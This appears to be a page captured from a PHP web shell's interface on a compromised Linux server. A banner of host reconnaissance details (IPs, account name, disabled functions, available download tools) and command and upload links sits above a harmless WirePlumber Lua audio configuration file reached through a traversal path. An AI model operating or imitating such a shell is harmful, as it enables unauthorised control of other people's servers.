Server IP : 192.168.23.10 / Your IP : 18.221.97.20 Web Server : Apache System : Linux echo.premieradvertising.com 5.14.0-362.8.1.el9_3.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Nov 7 14:54:22 EST 2023 x86_64 User : rrrallyteam ( 1049) PHP Version : 8.1.31 Disable Function : exec,passthru,shell_exec,system MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF Directory (0755) : /home/../usr/share/wireplumber/main.lua.d/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
device_defaults = {} device_defaults.enabled = true device_defaults.properties = { -- store preferences to the file system and restore them at startup; -- when set to false, default nodes and routes are selected based on -- their priorities and any runtime changes do not persist after restart ["use-persistent-storage"] = true, -- the default volumes to apply to ACP device nodes, in the linear scale --["default-volume"] = 0.064, --["default-input-volume"] = 1.0, -- Whether to auto-switch to echo cancel sink and source nodes or not ["auto-echo-cancel"] = true, -- Sets the default echo-cancel-sink node name to automatically switch to ["echo-cancel-sink-name"] = "echo-cancel-sink", -- Sets the default echo-cancel-source node name to automatically switch to ["echo-cancel-source-name"] = "echo-cancel-source", } -- Sets persistent device profiles that should never change when wireplumber is -- running, even if a new profile with higher priority becomes available device_defaults.persistent_profiles = { { matches = { { -- Matches all devices { "device.name", "matches", "*" }, }, }, profile_names = { "off", "pro-audio" } }, } function device_defaults.enable() if device_defaults.enabled == false then return end -- Selects appropriate default nodes and enables saving and restoring them load_module("default-nodes", device_defaults.properties) -- Selects appropriate profile for devices load_script("policy-device-profile.lua", { persistent = device_defaults.persistent_profiles }) -- Selects appropriate device routes ("ports" in pulseaudio terminology) -- and enables saving and restoring them together with -- their properties (per-route/port volume levels, channel maps, etc) load_script("policy-device-routes.lua", device_defaults.properties) if device_defaults.properties["use-persistent-storage"] then -- Enables functionality to save and restore default device profiles load_module("default-profile") end end